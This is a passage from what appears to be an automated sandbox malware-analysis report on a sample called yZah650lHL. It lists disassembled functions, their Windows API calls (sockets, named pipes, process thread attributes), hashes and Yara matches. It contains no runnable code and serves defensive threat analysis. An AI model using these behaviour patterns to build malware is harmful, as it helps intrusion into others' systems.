                    • Opcode ID: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                    • Instruction ID: df1a2f1e0fb05b95aa4e2a41103ac0155ce180c4fd263ffc718e7481fa4e2d62
                    • Opcode Fuzzy Hash: 89153f5c64fab27db57a2af5758249aa045b2e8adbb4ff24b9161b74b74b034e
                    • Instruction Fuzzy Hash: 9C1122632083E489CB2596219050B3ABAD0F3B5FD5B1D812DEAD70BA45CB2CC541CB50
                    Function 001A04D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: clock
                    • String ID:
                    • API String ID: 3195780754-0
                    • Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                    • Instruction ID: dba1a0da941d908dcf79781d7b2a93baaae24648750842988d629b3281201762
                    • Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
                    • Instruction Fuzzy Hash: 19114826A04748895732EEA6748052BF690FB9D390F190035FE4403205EB74C881CF41
                    Function 0067EF5C Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON
                    Download Yara Rule
                    APIs
                    • accept.WS2_32 ref: 0067EF71
                    • send.WS2_32 ref: 0067EFAF
                    • send.WS2_32 ref: 0067EFC3
                    • closesocket.WS2_32 ref: 0067EFD4
                      • Part of subcall function 0067F098: closesocket.WS2_32 ref: 0067F0A4
                      • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0AE
                      • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0B7
                      • Part of subcall function 0067F098: free.LIBCMT ref: 0067F0C0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$closesocketsend$accept
                    • String ID:
                    • API String ID: 47150829-0
                    • Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                    • Instruction ID: cf58eb68758bca1531fd76496b1870bd21c618929383d594a1707bb9788da1b2
                    • Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
                    • Instruction Fuzzy Hash: 7E012C7531494181DB549B36E965B292362E78DFF4F149211DE2A07F85CE3AC4958B40
                    Function 006753EC Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$NamedPeekPipeSleep
                    • String ID:
                    • API String ID: 1593283408-0
                    • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                    • Instruction ID: 94c007245e2648addf3c19d2b24951ee6a5b039a2cf0f1d7f3946ca565b745a6
                    • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                    • Instruction Fuzzy Hash: 24F0A432614E5192E7108B25F84431AA3A6F784B81F648160DB8E42E78DE79C4D18705
                    Function 006748D8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$NamedPeekPipeSleep
                    • String ID:
                    • API String ID: 1593283408-0
                    • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                    • Instruction ID: 731b81161f5110ee6af5e0396237b43d73dcf653e201295d023d5e07bafe4612
                    • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                    • Instruction Fuzzy Hash: D7F0A432614A5192E7108B25F85431BB766F785B94F648120DB8D42F74DF3DC8918B04
                    Function 006776F0 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON
                    Download Yara Rule
                    APIs
                    • InitializeProcThreadAttributeList.KERNEL32 ref: 0067770E
                    • GetProcessHeap.KERNEL32 ref: 00677714
                    • HeapAlloc.KERNEL32 ref: 00677724
                    • InitializeProcThreadAttributeList.KERNEL32 ref: 0067773F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                    • String ID:
                    • API String ID: 1212816094-0
                    • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                    • Instruction ID: f678ab742e7207cbd561e49493ae46e7ce0d9f2ae07cae3b3ba7a2ec787c370f
                    • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                    • Instruction Fuzzy Hash: 65F0BB2672564192DB58CB75F45075A63A6EB8CB90F585436FB0F42B14DE3DC4958B00
                    Function 0067F098 Relevance: 6.0, APIs: 4, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • closesocket.WS2_32 ref: 0067F0A4
                    • free.LIBCMT ref: 0067F0AE
                      • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                      • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                      • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                    • free.LIBCMT ref: 0067F0B7
                    • free.LIBCMT ref: 0067F0C0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                    • String ID:
                    • API String ID: 1525665891-0
                    • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                    • Instruction ID: d39bbc40504ba38ceb802984a6386ecaa7359909dca3ee8dfc6d7303dc756805
                    • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                    • Instruction Fuzzy Hash: 9ED09E2671844481DF54EFF2D8A663C1322E7D8F94F1440359E2E4B366CD64CD95C348
                    Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                    Download Yara Rule
                    Strings
                    • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                    • Unknown pseudo relocation bit size %d., xrefs: 00402294
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID:
                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                    • API String ID: 0-395989641
                    • Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                    • Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
                    • Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                    • Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608
                    Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                    • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: QueryVirtual
                    • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                    • API String ID: 1804819252-157664173
                    • Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                    • Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
                    • Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                    • Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788
                    Function 00401010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: __set_app_type
                    • String ID: 06E$P0E
                    • API String ID: 1108511539-3978550416
                    • Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                    • Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
                    • Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                    • Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18
                    Function 0067F860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 0067F8B1
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _invalid_parameter_noinfo.LIBCMT ref: 0067F8BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID: B
                    • API String ID: 1812809483-1255198513
                    • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                    • Instruction ID: 696ec82873bee636f2cfc17656ce8eca3729c8e3e8ee0a98847dae6747d9afc8
                    • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                    • Instruction Fuzzy Hash: 9001ADB2620B4086DB109F12E440799B662FB98FE4FA88325AF5C07BA5CF38C141CB04
                    Function 001BEC60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 001BECB1
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _invalid_parameter_noinfo.LIBCMT ref: 001BECBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID: B
                    • API String ID: 1812809483-1255198513
                    • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                    • Instruction ID: 4ab64148a078f30f592bfda4bf66d86ddaf9101564b499946e096a0180613029
                    • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                    • Instruction Fuzzy Hash: 31018472614B5486EB109F12D4447D9B6A1F7A9FE4F584325EF5817B95CF38C144CB00
                    Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    • Unknown error, xrefs: 00401D2C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-3474627141
                    • Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                    • Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
                    • Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                    • Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704
                    Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • Overflow range error (OVERFLOW), xrefs: 00401D00
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4064033741
                    • Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                    • Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
                    • Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                    • Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                    Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2187435201
                    • Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                    • Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
                    • Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                    • Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704
                    Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • Total loss of significance (TLOSS), xrefs: 00401D20
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4273532761
                    • Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                    • Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
                    • Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                    • Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704
                    Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    • Argument domain error (DOMAIN), xrefs: 00401CE0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2713391170
                    • Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                    • Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
                    • Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                    • Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                    Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • Partial loss of significance (PLOSS), xrefs: 00401CF0
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4283191376
                    • Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                    • Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
                    • Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                    • Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                    Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • Argument singularity (SIGN), xrefs: 00401C78
                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2468659920
                    • Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                    • Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
                    • Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                    • Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704
                    Function 00661CC4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • calloc.LIBCMT ref: 00661D6A
                      • Part of subcall function 0068EE08: _calloc_impl.LIBCMT ref: 0068EE18
                      • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE2B
                      • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE35
                    • free.LIBCMT ref: 00661EF3
                    • free.LIBCMT ref: 00661EFD
                    • free.LIBCMT ref: 00661F0F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_calloc_implcalloc
                    • String ID:
                    • API String ID: 4000150058-0
                    • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                    • Instruction ID: 1a8b3b2cf1c52a6259925237e4e9cbc3425f2cca5b61c0d3a4cc04866f41f30a
                    • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                    • Instruction Fuzzy Hash: 18C13B32608B848AD760CF65E88039E77B5F789B88F14412AEF8D87B18EF39C555CB00
                    Function 001A10C4 Relevance: 5.3, APIs: 4, Instructions: 261COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • calloc.LIBCMT ref: 001A116A
                      • Part of subcall function 001CE208: _calloc_impl.LIBCMT ref: 001CE218
                      • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE22B
                      • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE235
                    • free.LIBCMT ref: 001A12F3
                    • free.LIBCMT ref: 001A12FD
                    • free.LIBCMT ref: 001A130F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_calloc_implcalloc
                    • String ID:
                    • API String ID: 4000150058-0
